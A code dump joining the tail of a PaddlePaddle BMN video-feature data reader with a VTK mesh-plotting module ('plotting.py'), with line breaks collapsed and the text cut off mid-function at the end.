(gt_xmaxs - gt_len_small / 2, gt_xmaxs + gt_len_small / 2), axis=1) match_score_start = [] for jdx in range(len(self.anchor_xmin)): match_score_start.append( np.max( ioa_with_anchors(self.anchor_xmin[jdx], self.anchor_xmax[ jdx], gt_start_bboxs[:, 0], gt_start_bboxs[:, 1]))) match_score_end = [] for jdx in range(len(self.anchor_xmin)): match_score_end.append( np.max( ioa_with_anchors(self.anchor_xmin[jdx], self.anchor_xmax[ jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1]))) gt_start = np.array(match_score_start) gt_end = np.array(match_score_end) return gt_iou_map, gt_start, gt_end def load_file(self, video_name): file_name = video_name + ".npy" file_path = os.path.join(self.feat_path, file_name) video_feat = np.load(file_path) video_feat = video_feat.T video_feat = video_feat.astype("float32") return video_feat def create_reader(self): """reader creator for bmn model""" if self.mode == 'infer': return self.make_infer_reader() if self.num_threads == 1: return self.make_reader() else: sysstr = platform.system() if sysstr == 'Windows': return self.make_multithread_reader() else: return self.make_multiprocess_reader() def make_infer_reader(self): """reader for inference""" def reader(): batch_out = [] for video_name in self.video_list: video_idx = self.video_list.index(video_name) video_feat = self.load_file(video_name) batch_out.append((video_feat, video_idx)) if len(batch_out) == self.batch_size: yield batch_out batch_out = [] return reader def make_reader(self): """single process reader""" def reader(): video_list = self.video_list if self.mode == 'train': random.shuffle(video_list) batch_out = [] for video_name in video_list: video_idx = video_list.index(video_name) video_feat = self.load_file(video_name) gt_iou_map, gt_start, gt_end = self.get_video_label(video_name) if self.mode == 'train' or self.mode == 'valid': batch_out.append((video_feat, gt_iou_map, gt_start, gt_end)) elif self.mode == 'test': batch_out.append( (video_feat, gt_iou_map, gt_start, gt_end, video_idx)) else: raise NotImplementedError('mode {} not implemented'.format( self.mode)) if len(batch_out) == self.batch_size: yield batch_out batch_out = [] return reader def make_multithread_reader(self): def reader(): if self.mode == 'train': random.shuffle(self.video_list) for video_name in self.video_list: video_idx = self.video_list.index(video_name) yield [video_name, video_idx] def process_data(sample, mode): video_name = sample[0] video_idx = sample[1] video_feat = self.load_file(video_name) gt_iou_map, gt_start, gt_end = self.get_video_label(video_name) if mode == 'train' or mode == 'valid': return (video_feat, gt_iou_map, gt_start, gt_end) elif mode == 'test': return (video_feat, gt_iou_map, gt_start, gt_end, video_idx) else: raise NotImplementedError('mode {} not implemented'.format( mode)) mapper = functools.partial(process_data, mode=self.mode) def batch_reader(): xreader = paddle.reader.xmap_readers(mapper, reader, self.num_threads, 1024) batch = [] for item in xreader(): batch.append(item) if len(batch) == self.batch_size: yield batch batch = [] return batch_reader def make_multiprocess_reader(self): """multiprocess reader""" def read_into_queue(video_list, queue): batch_out = [] for video_name in video_list: video_idx = video_list.index(video_name) video_feat = self.load_file(video_name) gt_iou_map, gt_start, gt_end = self.get_video_label(video_name) if self.mode == 'train' or self.mode == 'valid': batch_out.append((video_feat, gt_iou_map, gt_start, gt_end)) elif self.mode == 'test': batch_out.append( (video_feat, gt_iou_map, gt_start, gt_end, video_idx)) else: raise NotImplementedError('mode {} not implemented'.format( self.mode)) if len(batch_out) == self.batch_size: queue.put(batch_out) batch_out = [] queue.put(None) def queue_reader(): video_list = self.video_list if self.mode == 'train': random.shuffle(video_list) n = self.num_threads queue_size = 20 reader_lists = [None] * n file_num = int(len(video_list) // n) for i in range(n): if i < len(reader_lists) - 1: tmp_list = video_list[i * file_num:(i + 1) * file_num] else: tmp_list = video_list[i * file_num:] reader_lists[i] = tmp_list manager = multiprocessing.Manager() queue = manager.Queue(queue_size) p_list = [None] * len(reader_lists) for i in range(len(reader_lists)): reader_list = reader_lists[i] p_list[i] = multiprocessing.Process( target=read_into_queue, args=(reader_list, queue)) p_list[i].start() reader_num = len(reader_lists) finish_num = 0 while finish_num < reader_num: sample = queue.get() if sample is None: finish_num += 1 else: yield sample for i in range(len(p_list)): if p_list[i].is_alive(): p_list[i].join() return queue_reader
plotting.py
""" vtk plotting module """ from multiprocessing import Process import colorsys import numpy as np import vtkInterface import imageio import time import logging from PIL import Image log = logging.getLogger(__name__) log.setLevel('CRITICAL') try: import vtk from vtk.util import numpy_support as VN font_keys = {'arial': vtk.VTK_ARIAL, 'courier': vtk.VTK_COURIER, 'times': vtk.VTK_TIMES} except: pass def Plot(mesh, **args): """ Convenience plotting function for a vtk object Includes extra argument 'screenshot', otherwise see : help(vtkInterface.PlotClass.AddMesh) """ if 'screenshot' in args: filename = args['screenshot'] del args['screenshot'] else: filename = None if 'cpos' in args: cpos = args['cpos'] del args['cpos'] else: cpos = None # create plotting object and add mesh plobj = PlotClass() if isinstance(mesh, np.ndarray): plobj.AddPoints(mesh, **args) else: plobj.AddMesh(mesh, **args) # Set camera if cpos: plobj.SetCameraPosition(cpos) cpos = plobj.Plot(autoclose=False) # take screenshot if filename: plobj.TakeScreenShot(filename) # close and return camera position plobj.Close() return cpos def PlotArrows(cent, direction): """ Plots arrows """ plotter = PlotClass() plotter.AddArrows(cent, direction) return plotter.Plot() class PlotClass(object): """ Plotting object to display vtk meshes or numpy arrays. Example ------- plobj = PlotClass() plobj.AddMesh(mesh, color='red') plobj.AddMesh(another_mesh, color='blue') plobj.Plot() Parameters ---------- off_screen : bool, optional Renders off screen when False. Useful for automated screenshots. """ last_update_time = 0.0 def __init__(self, off_screen=False): def onTimer(iren, eventId): if 'TimerEvent' == eventId: # TODO: python binding didn't provide # third parameter, which indicate right timer id # timer_id = iren.GetCommand(44) # if timer_id != self.right_timer_id: # return self.iren.TerminateApp() """ Initialize a vtk plotting object """ self.right_timer_id = -1 self.off_screen = off_screen # initialize render window self.renderer = vtk.vtkRenderer() self.renWin = vtk.vtkRenderWindow() self.renWin.AddRenderer(self.renderer) if self.off_screen: self.renWin.SetOffScreenRendering(1) else: # Allow user to interact self.iren = vtk.vtkRenderWindowInteractor() self.iren.SetDesiredUpdateRate(30.0) self.iren.SetRenderWindow(self.renWin) istyle = vtk.vtkInteractorStyleTrackballCamera() self.iren.SetInteractorStyle(istyle) # Set background self.renderer.SetBackground(0.3, 0.3, 0.3) # initialize image filter self.ifilter = vtk.vtkWindowToImageFilter() self.ifilter.SetInput(self.renWin) self.ifilter.SetInputBufferTypeToRGB() self.ifilter.ReadFrontBufferOff() # initialize movie type self.movietype = None # add timer event if interactive render exists if hasattr(self, 'iren'): self.iren.AddObserver(vtk.vtkCommand.TimerEvent, onTimer) def Update(self, stime=1, force_redraw=True): """ Update window, redraw, process messages query Parameters ---------- stime : float, optional Duration of timer that interrupt vtkRenderWindowInteractor. force_redraw : bool, optional Call vtkRenderWindowInteractor.Render() immediately. """ if stime <= 0: stime = 1 if force_redraw: self.iren.Render() curr_time = time.time() if PlotClass.last_update_time > curr_time: PlotClass.last_update_time = curr_time if (curr_time - PlotClass.last_update_time) > (1.0 / self.iren.GetDesiredUpdateRate()): self.right_timer_id = self.iren.CreateRepeatingTimer(stime) self.iren.Start() self.iren.DestroyTimer(self.right_timer_id) PlotClass.last_update_time = curr_time def AddMesh( self, mesh, color=None, style=None, scalars=None, rng=None, stitle=None, showedges=True, psize=5.0, opacity=1, linethick=None, flipscalars=False, lighting=False, ncolors=256, interpolatebeforemap=False, colormap=None): """ Adds a vtk unstructured, structured, or polymesh to the plotting object Parameters ---------- mesh : vtk unstructured, structured, or polymesh A vtk unstructured, structured, or polymesh to plot. color : string or 3 item list, optional, defaults to white Either a string, rgb list, or hex color string. For example: color='white' color='w' color=[1, 1, 1] color='#FFFFFF' Color will be overridden when scalars are input. style : string, optional Visualization style of the vtk mesh. One for the following: style='surface' style='wireframe' style='points' Defaults to 'surface' scalars : numpy array, optional Scalars used to "color" the mesh. Accepts an array equal to the number of cells or the number of points in the mesh. Array should be sized as a single vector. rng : 2 item list, optional Range of mapper for scalars. Defaults to minimum and maximum of scalars array. Example: [-1, 2] stitle : string, optional Scalar title. By default there is no scalar legend bar. Setting this creates the legend bar and adds a title to it. To create a bar with no title, use an empty string (i.e. ''). showedges : bool, optional Shows the edges of a mesh. Does not apply to a wireframe representation. psize : float, optional Point size. Applicable when style='points'. Default 5.0 opacity : float, optional Opacity of mesh. Should be between 0 and 1. Default 1.0 linethick : float, optional Thickness of lines. Only valid for wireframe and surface representations. Default None. flipscalars : bool, optional Flip direction of colormap. lighting : bool, optional Enable or disable Z direction lighting. True by default. ncolors : int, optional Number of colors to use when displaying scalars. Default 256. interpolatebeforemap : bool, default False Enabling makes for a smoother scalar display. Default False colormap : str, optional Colormap string. See available matplotlib colormaps. Only applicable for when displaying scalars. Defaults None (rainbow). Requires matplotlib. Returns ------- actor: vtk.vtkActor VTK actor of the mesh. """ # set main values self.mesh = mesh self.mapper = vtk.vtkDataSetMapper() self.mapper.SetInputData(self.mesh) actor, prop = self.AddActor(self.mapper) # Scalar formatting =================================================== if scalars is not None: # convert to numpy array if not isinstance(scalars, np.ndarray): scalars = np.asarray(scalars) # ravel if not 1 dimentional if scalars.ndim != 1: scalars = scalars.ravel() # Scalar interpolation approach if scalars.size == mesh.GetNumberOfPoints(): self.mesh.AddPointScalars(scalars, '', True) self.mapper.SetScalarModeToUsePointData() self.mapper.GetLookupTable().SetNumberOfTableValues(ncolors) if interpolatebeforemap: self.mapper.InterpolateScalarsBeforeMappingOn() elif scalars.size == mesh.GetNumberOfCells(): self.mesh.AddCellScalars(scalars, '') self.mapper.SetScalarModeToUseCellData() else: raise Exception('Number of scalars (%d) ' % scalars.size + 'must match either the number of points ' + '(%d) ' % mesh.GetNumberOfPoints() + 'or the number of cells ' + '(%d) ' % mesh.GetNumberOfCells()) # Set scalar range if not rng: rng = [np.nanmin(scalars), np.nanmax(scalars)] elif isinstance(rng, float): rng = [-rng, rng] if np.any(rng): self.mapper.SetScalarRange(rng[0], rng[1]) # Flip if requested table = self.mapper.GetLookupTable() if colormap is not None: try: from matplotlib.cm import get_cmap except ImportError: raise Exception('colormap requires matplotlib') cmap = get_cmap(colormap) ctable = cmap(np.linspace(0, 1, ncolors))*255 ctable = ctable.astype(np.uint8) if flipscalars: ctable = np.ascontiguousarray(ctable[::-1]) table.SetTable(VN.numpy_to_vtk(ctable)) # change direction of colormap # if flipscalars: # table.ForceBuild() # ctable = VN.vtk_to_numpy(table.GetTable()) # table.SetTable(VN.numpy_to_vtk(ctable)) else: self.mapper.SetScalarModeToUseFieldData() # select view style if not style: style = 'surface' style = style.lower() if style == 'wireframe': prop.SetRepresentationToWireframe() elif style == 'points': prop.SetRepresentationToPoints() elif style == 'surface': prop.SetRepresentationToSurface() else: raise Exception('Invalid style. Must be one of the following:\n' + '\t"surface"\n' + '\t"wireframe"\n' + '\t"points"\n') prop.SetPointSize(psize) # edge display style if showedges: prop.EdgeVisibilityOn() prop.SetColor(ParseColor(color)) prop.SetOpacity(opacity) # lighting display style if lighting is False: prop.LightingOff() # set line thickness if linethick: prop.SetLineWidth(linethick) # Add scalar bar if available if stitle is not None: self.AddScalarBar(stitle) return actor def AddActor(self, uinput): """adds an actor to render window. creates an actor if input is a mapper""" if isinstance(uinput, vtk.vtkMapper): actor = vtk.vtkActor() actor.SetMapper(uinput) else: actor = uinput self.renderer.AddActor(actor) return actor, actor.GetProperty() def AddBoundsAxes(self, mesh=None, bounds=None, show_xaxis=True, show_yaxis=True, show_zaxis=True, show_xlabels=True, show_ylabels=True, show_zlabels=True, italic=False, bold=True, shadow=False, fontsize=16, font_family='courier', color='w', xtitle='X Axis', ytitle='Y Axis', ztitle='Z Axis', use_2dmode=True): """ Adds bounds axes. Shows the bounds of the most recent input mesh unless mesh is specified. Parameters ---------- mesh : vtkPolydata or unstructured grid, optional Input mesh to draw bounds axes around bounds : list or tuple, optional Bounds to override mesh bounds. [xmin, xmax, ymin, ymax, zmin, zmax] show_xaxis : bool, optional Makes x axis visible. Default True. show_yaxis : bool, optional Makes y axis visible. Default True. show_zaxis : bool, optional Makes z axis visible. Default True. show_xlabels : bool, optional Shows x labels. Default True. show_ylabels : bool, optional Shows y labels. Default True. show_zlabels : bool, optional Shows z labels. Default True. italic : bool, optional Italicises axis labels and numbers. Default False. bold : bool, optional Bolds axis labels and numbers. Default True. shadow : bool, optional Adds a black shadow to the text. Default False. fontsize : float, optional Sets the size of the label font. Defaults to 16. font_family : string, optional Font family. Must be either courier, times, or arial. color : string or 3 item list, optional Color of all labels and axis titles. Default white. Either a string, rgb list, or hex color string. For example: color='white' color='w' color=[1, 1, 1] color='#FFFFFF' xtitle : string, optional Title of the x axis. Default "X Axis" ytitle : string, optional Title of the y axis. Default "Y Axis" ztitle : string, optional Title of the z axis. Default "Z Axis" use_2dmode : bool, optional A bug with vtk 6.3 in Windows seems to cause this function to crash this can be enabled for smoother plotting for other enviornments. Returns ------- cubeAxesActor : vtk.vtkCubeAxesActor Bounds actor """ # Use last input mesh if availble if not mesh and not bounds: if not hasattr(self, 'mesh'): raise Exception('Specify bounds or first input a mesh') mesh = self.mesh # create actor cubeAxesActor = vtk.vtkCubeAxesActor() cubeAxesActor.SetUse2DMode(False) # set bounds if not bounds: bounds = mesh.GetBounds() cubeAxesActor.SetBounds(mesh.GetBounds()) # show or hide axes cubeAxesActor.SetXAxisVisibility(show_xaxis) cubeAxesActor.SetYAxisVisibility(show_yaxis) cubeAxesActor.SetZAxisVisibility(show_zaxis) # disable minor ticks cubeAxesActor.XAxisMinorTickVisibilityOff() cubeAxesActor.YAxisMinorTickVisibilityOff() cubeAxesActor.ZAxisMinorTickVisibilityOff() cubeAxesActor.SetCamera(self.renderer.GetActiveCamera()) # set color color = ParseColor(color) cubeAxesActor.GetXAxesLinesProperty().SetColor(color) cubeAxesActor.GetYAxesLinesProperty().SetColor(color) cubeAxesActor.GetZAxesLinesProperty().SetColor(color) # empty arr empty_str = vtk.vtkStringArray() empty_str.InsertNextValue('') # show lines if show_xaxis: cubeAxesActor.SetXTitle(xtitle) else: cubeAxesActor.SetXTitle('') cubeAxesActor.SetAxisLabels(0, empty_str) if show_yaxis: cubeAxesActor.SetYTitle(ytitle) else: cubeAxesActor.SetYTitle('') cubeAxesActor.SetAxisLabels(1, empty_str) if show_zaxis: cubeAxesActor.SetZTitle(ztitle) else: cubeAxesActor.SetZTitle('') cubeAxesActor.SetAxisLabels(2, empty_str) # show labels if not show_xlabels: cubeAxesActor.SetAxisLabels(0, empty_str) if not show_ylabels: cubeAxesActor.SetAxisLabels(1, empty_str) if not show_zlabels: cubeAxesActor.SetAxisLabels(2, empty_str) # set font font_family = ParseFontFamily(font_family) for i in range(3): cubeAxesActor.GetTitleTextProperty(i).SetFontSize(fontsize) cubeAxesActor.GetTitleTextProperty(i).SetColor(color) cubeAxesActor.GetTitleTextProperty(i).SetFontFamily(font_family) cubeAxesActor.GetTitleTextProperty(i).SetBold(bold) cubeAxesActor.GetLabelTextProperty(i).SetFontSize(fontsize) cubeAxesActor.GetLabelTextProperty(i).SetColor(color) cubeAxesActor.GetLabelTextProperty(i).SetFontFamily(font_family) cubeAxesActor.GetLabelTextProperty(i).SetBold(bold) self.AddActor(cubeAxesActor) self.cubeAxesActor = cubeAxesActor return cubeAxesActor def AddScalarBar(self, title=None, nlabels=5, italic=False, bold=True, title_fontsize=None, label_fontsize=None, color=None, font_family='courier', shadow=False): """ Creates scalar bar using the ranges as set by the last input mesh. Parameters ---------- title : string, optional Title of the scalar bar. Default None nlabels : int, optional Number of labels to use for the scalar bar. italic : bool, optional Italicises title and bar labels. Default False. bold : bool, optional Bolds title and bar labels. Default True title_fontsize : float, optional Sets the size of the title font. Defaults to None and is sized automatically. label_fontsize : float, optional Sets the size of the title font. Defaults to None and is sized automatically. color : string or 3 item list, optional, defaults to white Either a string, rgb list, or hex color string. For example: color='white' color='w' color=[1, 1, 1] color='#FFFFFF' font_family : string, optional Font family. Must be either courier, times, or arial. shadow : bool, optional Adds a black shadow to the text. Defaults to False Notes ----- Setting title_fontsize, or label_fontsize disables automatic font sizing for both the title and label. """ # check if maper exists if not hasattr(self, 'mapper'): raise Exception('Mapper does not exist. ' + 'Add a mesh with scalars first.') # parse color color = ParseColor(color) # Create scalar bar self.scalarBar = vtk.vtkScalarBarActor() self.scalarBar.SetLookupTable(self.mapper.GetLookupTable()) self.scalarBar.SetNumberOfLabels(nlabels) if label_fontsize or title_fontsize: self.scalarBar.UnconstrainedFontSizeOn() if nlabels: label_text = self.scalarBar.GetLabelTextProperty() label_text.SetColor(color) label_text.SetShadow(shadow) # Set font label_text.SetFontFamily(ParseFontFamily(font_family)) label_text.SetItalic(italic) label_text.SetBold(bold) if label_fontsize: label_text.SetFontSize(label_fontsize) # Set properties if title: self.scalarBar.SetTitle(title) title_text = self.scalarBar.GetTitleTextProperty() title_text.SetItalic(italic) title_text.SetBold(bold) title_text.SetShadow(shadow) if title_fontsize: title_text.SetFontSize(title_fontsize) # Set font title_text.SetFontFamily(ParseFontFamily(font_family)) # set color title_text.SetColor(color) self.renderer.AddActor(self.scalarBar) def UpdateScalars(self, scalars, mesh=None, render=True): """ updates scalars of object (point only for now) assumes last inputted mesh if mesh left empty """ if mesh is None: mesh = self.mesh # get pointer to active point scalars if scalars.shape[0] == mesh.GetNumberOfPoints(): s = VN.vtk_to_numpy(self.mesh.GetPointData().GetScalars()) s[:] = scalars # get pointer to active cell scalars elif scalars.shape[0] == mesh.GetNumberOfCells(): s = VN.vtk_to_numpy(self.mesh.GetCellData().GetScalars()) s[:] = scalars if render: self.Render() def UpdatePointScalars(self, scalars, points=None, render=True): """ updates scalars of object (point only for now) assumes last inputted mesh if mesh left empty """ if points is None: points = self.points # get pointer to active point scalars if scalars.shape[0] == points.GetNumberOfPoints(): s = VN.vtk_to_numpy(points.GetPointData().GetScalars()) s[:] = scalars if render: self.Render() def UpdateCoordinates(self, points, mesh=None, render=True): """ Updates points of object (point only for now) assumes last inputted mesh if mesh left empty """ if mesh is None: mesh = self.mesh mesh.points = points if render: self.Render() def Close(self): """ closes render window """ if hasattr(self, 'renWin'): self.renWin.Finalize() del self.renWin if hasattr(self, 'iren'): del self.iren if hasattr(self, 'textActor'): del self.textActor # end movie if hasattr(self, 'mwriter'): try: self.mwriter.close() except BaseException: pass if hasattr(self, 'ifilter'): del self.ifilter def AddText(self, text, position=[10, 10], fontsize=50, color=None, font='courier', shadow=False): """ Adds text to plot object Parameters ---------- font : string, optional Font name may be courier, times, or arial shadow : bool, optional Adds a black shadow to the text. Defaults to False Returns ------- textActor : vtk.vtkTextActor Text actor added to plot """ self.textActor = vtk.vtkTextActor() self.textActor.SetPosition(position) self.textActor.GetTextProperty().SetFontSize(fontsize) self.textActor.GetTextProperty().SetColor(ParseColor(color)) self.textActor.GetTextProperty().SetFontFamily(font_keys[font]) self.textActor.GetTextProperty().SetShadow(shadow) self.textActor.SetInput(text) self.AddActor(self.textActor) return self.textActor def OpenMovie(self, filename, framerate=24, codec='libx264', preset='medium'): """ Establishes a connection to the ffmpeg writer """ # Attempt to load moviepy try: import moviepy.video.io.ffmpeg_writer as mwrite except BaseException: print('\n\nTo use this feature install moviepy and ffmpeg\n\n') import moviepy.video.io.ffmpeg_writer as mwrite # Create movie object and check if render window is active self.window_size = self.renWin.GetSize() if not self.window_size[0]: raise Exception('Run Plot first') self.mwriter = mwrite.FFMPEG_VideoWriter(filename, self.window_size, framerate, codec=codec, preset=preset) self.movietype = 'mp4' def OpenGif(self, filename): if filename[-3:] != 'gif': raise Exception('Unsupported filetype') self.mwriter = imageio.get_writer(filename, mode='I') def WriteFrame(self): """ Writes a single frame to the movie file """ if self.movietype is 'mp4': self.mwriter.write_frame(self.GetImage()) else: self.mwriter.append_data(self.GetImage()) def GetImage(self): """ Returns an image array of current render window """ window_size = self.renWin.GetSize() # Update filter and grab pixels self.ifilter.Modified() self.ifilter.Update() image = self.ifilter.GetOutput() img_array = vtkInterface.GetPointScalars(image, 'ImageScalars') # Reshape and write return img_array.reshape((window_size[1], window_size[0], -1))[::-1] def AddLines(self, lines, color=[1, 1, 1], width=5): """ Adds an actor to the renderwindow """ if isinstance(lines, np.ndarray): lines = vtkInterface.MakeLine(lines) # Create mapper and add lines mapper = vtk.vtkDataSetMapper() vtkInterface.SetVTKInput(mapper, lines) # Create Actor actor = vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().SetLineWidth(width) actor.GetProperty().EdgeVisibilityOn() actor.GetProperty().SetEdgeColor(color) actor.GetProperty().SetColor(ParseColor(color)) actor.GetProperty().LightingOff() # Add to renderer self.renderer.AddActor(actor) def AddPointLabels(self, points, labels, bold=True, fontsize=16, textcolor='k', font_family='courier', shadow=False, showpoints=True, pointcolor='k', pointsize=5): """ Creates a point actor with one label from list labels assigned to each point. Parameters ---------- points : np.ndarray 3 x n numpy array of points. labels : list List of labels. Must be the same length as points. italic : bool, optional Italicises title and bar labels. Default False. bold : bool, optional Bolds title and bar labels. Default True fontsize : float, optional Sets the size of the title font. Defaults to 16. textcolor : string or 3 item list, optional, defaults to black Color of text. Either a string, rgb list, or hex color string. For example: textcolor='white' textcolor='w' textcolor=[1, 1, 1] textcolor='#FFFFFF' font_family : string, optional Font family. Must be either courier, times, or arial. shadow : bool, optional Adds a black shadow to the text. Defaults to False showpoints : bool, optional Controls if points are visible. Default True pointcolor : string or 3 item list, optional, defaults to black Color of points (if visible). Either a string, rgb list, or hex color string. For example: textcolor='white' textcolor='w' textcolor=[1, 1, 1] textcolor='#FFFFFF' pointsize : float, optional Size of points (if visible) Returns ------- labelMapper : vtk.vtkvtkLabeledDataMapper VTK label mapper. Can be used to change properties of the labels. """ if len(points) != len(labels): raise Exception('There must be one label for each point') vtkpoints = vtkInterface.MakePointMesh(points) vtklabels = vtk.vtkStringArray() vtklabels.SetName('labels') for item in labels: vtklabels.InsertNextValue(str(item)) vtkpoints.GetPointData().AddArray(vtklabels) # create label mapper labelMapper = vtk.vtkLabeledDataMapper() labelMapper.SetInputData(vtkpoints) textprop = labelMapper.GetLabelTextProperty() textprop.SetBold(bold) textprop.SetFontSize(fontsize) textprop.SetFontFamily(ParseFontFamily(font_family)) textprop.SetColor(ParseColor(textcolor)) textprop.SetShadow(shadow) labelMapper.SetLabelModeToLabelFieldData() labelMapper.SetFieldDataName('labels') labelActor = vtk.vtkActor2D() labelActor.SetMapper(labelMapper) # add points if showpoints: self.AddMesh(vtkpoints, style='points', color=pointcolor, psize=pointsize) else: self.AddMesh(vtkpoints) self.AddActor(labelActor) return labelMapper def AddPoints(self, points, color=None, psize=5, scalars=None, rng=None, name='', opacity=1, stitle='', flipscalars=False): """ Adds a point actor or numpy points array to plotting object """ # select color if color is None: color = [1, 1, 1] elif isinstance(color, str): color = vtkInterface.StringToRGB(color) # Convert to vtk points object if "points" is a numpy array if isinstance(points, np.ndarray): # check size of points if points.ndim != 2 or points.shape[1] != 3: try: points = points.reshape((-1, 3)) except: raise Exception('Invalid point array shape' '%s' % str(points.shape)) self.points = vtkInterface.MakeVTKPointsMesh(points) else: self.points = points # Create mapper and add lines mapper = vtk.vtkDataSetMapper() mapper.SetInputData(self.points) if np.any(scalars): # vtkInterface.AddPointScalars(self.points, scalars, name, True) self.points.AddPointScalars(scalars, name, True) mapper.SetScalarModeToUsePointData() if not rng: rng = [np.min(scalars), np.max(scalars)] elif isinstance(rng, float): rng = [-rng, rng] if np.any(rng): mapper.SetScalarRange(rng[0], rng[1]) # Flip if requested # if flipscalars: # mapper.GetLookupTable().SetHueRange(0.66667, 0.0) # Create Actor actor = vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().SetPointSize(psize) actor.GetProperty().SetColor(color) actor.GetProperty().LightingOff() actor.GetProperty().SetOpacity(opacity) self.renderer.AddActor(actor) # Add scalar bar if stitle: self.scalarBar = vtk.vtkScalarBarActor() self.scalarBar.SetLookupTable(mapper.GetLookupTable()) self.scalarBar.GetTitleTextProperty().SetFontFamilyToCourier() self.scalarBar.GetTitleTextProperty().ItalicOff() self.scalarBar.GetTitleTextProperty().BoldOn() self.scalarBar.GetLabelTextProperty().SetFontFamilyToCourier() self.scalarBar.GetLabelTextProperty().ItalicOff() self.scalarBar.GetLabelTextProperty().BoldOn() self.scalarBar.SetTitle(stitle) self.scalarBar.SetNumberOfLabels(5) self.renderer.AddActor(self.scalarBar) def AddArrows(self, cent, direction, mag=1): """ Adds arrows to plotting object """ if cent.ndim != 2: cent = cent.reshape((-1, 3)) if direction.ndim != 2: direction = direction.reshape((-1, 3)) pdata = vtkInterface.CreateVectorPolyData(cent, direction * mag) arrows = CreateArrowsActor(pdata) self.AddActor(arrows) return arrows, pdata def AddLineSegments(self, points, edges, color=None, scalars=None, ncolors=256): """ Adds arrows to plotting object """ cent = (points[edges[:, 0]] + points[edges[:, 1]]) / 2 direction = points[edges[:, 1]] - points[edges[:, 0]] # pdata = vtkInterface.CreateVectorPolyData(cent, direction) pdata = vtkInterface.CreateVectorPolyData(cent, direction) arrows, mapper = CreateLineSegmentsActor(pdata) # set color if isinstance(color, str): color = vtkInterface.StringToRGB(color) mapper.ScalarVisibilityOff() arrows.GetProperty().SetColor(color) if scalars is not None: if scalars.size == edges.shape[0]: pdata.AddCellScalars(scalars, '', True) mapper.SetScalarModeToUseCellData() mapper.GetLookupTable().SetNumberOfTableValues(ncolors) # if interpolatebeforemap: # self.mapper.InterpolateScalarsBeforeMappingOn() else: raise Exception('Number of scalars must match number of edges') # add to rain class self.AddActor(arrows) return arrows def GetCameraPosition(self): """ Returns camera position of active render window """ camera = self.renderer.GetActiveCamera() pos = camera.GetPosition() fpt = camera.GetFocalPoint() vup = camera.GetViewUp() return [pos, fpt, vup] def SetCameraPosition(self, cameraloc): """ Set camera position of active render window """ camera = self.renderer.GetActiveCamera() camera.SetPosition(cameraloc[0]) camera.SetFocalPoint(cameraloc[1]) camera.SetViewUp(cameraloc[2]) # reset clipping range self.renderer.ResetCameraClippingRange() def SetBackground(self, color): """ Sets background color Parameters ---------- color : string or 3 item list, optional, defaults to white Either a string, rgb list, or hex color string. For example: color='white' color='w' color=[1, 1, 1] color='#FFFFFF' """ if color is None: color = [1, 1, 1] elif isinstance(color, str): color = vtkInterface.StringToRGB(color) self.renderer.SetBackground(color) def AddLegend(self, entries, bcolor=[0.5, 0.5, 0.5], border=False, pos=None): """ Adds a legend to render window. Entries must be a list containing one string and color entry for each item pos : list Two float list, each float between 0 and 1. For example [0.5, 0.5] would put the legend in the middle of the figure. Example ------- legend_entries = [] legend_entries.append(['Label', 'w']) plobj = PlotClass() plobj.AddMesh(mesh) plobj.AddLegend(legend_entries) plobj.Plot() """ legend = vtk.vtkLegendBoxActor() legend.SetNumberOfEntries(len(entries)) if pos: legend.SetPosition2(pos[0], pos[1]) c = 0 legendface = MakeLegendPoly() for entry in entries: color = ParseColor(entry[1]) legend.SetEntry(c, legendface, entry[0], color) c += 1 legend.UseBackgroundOn() legend.SetBackgroundColor(bcolor) if border: legend.BorderOn() else: legend.BorderOff() # Add to renderer self.renderer.AddActor(legend) return legend def _plot(self, title=None, window_size=[1024, 768], interactive=True, autoclose=True, interactive_update=False): """ Creates plotting window Parameters ---------- title : string, optional Title of plotting window. window_size : list, optional Window size in pixels. Defaults to [1024, 768] interactive : bool, optional Enabled by default. Allows user to pan and move figure. autoclose : bool, optional Enabled by default. Exits plotting session when user closes the window when interactive is True. interactive_update: bool, optional Disabled by default. Allows user to non-blocking draw, user should call Update() in each iteration. Returns ------- cpos : list List of camera position, focal point, and view up """ if title: self.renWin.SetWindowName(title) # size window self.renWin.SetSize(window_size[0], window_size[1]) # Render if interactive and (not self.off_screen): self.renWin.Render() self.iren.Initialize() if not interactive_update: # interrupts will be caught here try: self.iren.Start() except KeyboardInterrupt: self.Close() raise KeyboardInterrupt else: self.renWin.Render() # Get camera position before closing cpos = self.GetCameraPosition() if autoclose: self.Close() return cpos def Plot(self, title=None, window_size=[1024, 768], interactive=True, autoclose=True, in_background=False, interactive_update=False): """ Creates plotting window Parameters ---------- title : string, optional Title of plotting window. window_size : list, optional Window size in pixels. Defaults to [1024, 768] interactive : bool, optional Enabled by default. Allows user to pan and move figure. autoclose : bool, optional Enabled by default. Exits plotting session when user closes the window when interactive is True. interactive_update: bool, optional Disabled by default. Allows user to non-blocking draw, user should call Update() in each iteration. Returns ------- cpos : list List of camera position, focal point, and view up """ def PlotFun(): return self._plot(title, window_size, interactive, autoclose, interactive_update) if in_background: process = Process(target=PlotFun) process.start() return process else: return PlotFun() def RemoveActor(self, actor): self.renderer.RemoveActor(actor) def AddAxes(self): """ Add axes actor at origin """ axes = vtk.vtkAxesActor() self.marker = vtk.vtkOrientationMarkerWidget() self.marker.SetInteractor(self.iren) self.marker.SetOrientationMarker(axes) self.marker.SetEnabled(1) def TakeScreenShot(self, filename=None): """ Takes screenshot at current camera position Parameters ---------- filename : str, optional Filename to write image to. Returns ------- img : numpy.ndarray Array containing pixel RGB and alpha. Sized: [Window height x Window width x 4] """ # check render window exists if not hasattr(self, 'renWin'): raise Exception('Render window has been closed.\n' 'Run again with Plot(autoclose=False)') # create image filter ifilter = vtk.vtkWindowToImageFilter() ifilter.SetInput(self.renWin) ifilter.SetInputBufferTypeToRGBA() ifilter.ReadFrontBufferOff() ifilter.Update() image = ifilter.GetOutput() origshape = image.GetDimensions() img_array = vtkInterface.GetPointScalars(image, 'ImageScalars') # overwrite background background = self.renderer.GetBackground() mask = img_array[:, -1] == 0 img_array[mask, 0] = int(255 * background[0]) img_array[mask, 1] = int(255 * background[1]) img_array[mask, 2] = int(255 * background[2]) img_array[mask, -1] = 255 mask = img_array[:, -1] != 255 img_array[mask, -1] = 255 # write screenshot to file img = img_array.reshape((origshape[1], origshape[0], -1))[::-1, :, :] if filename: image = Image.fromarray(img) image.save(filename) return img def Render(self): self.renWin.Render() def __del__(self): log.debug('Object collected') def CreateLineSegmentsActor(pdata): # Create arrow object lines_source = 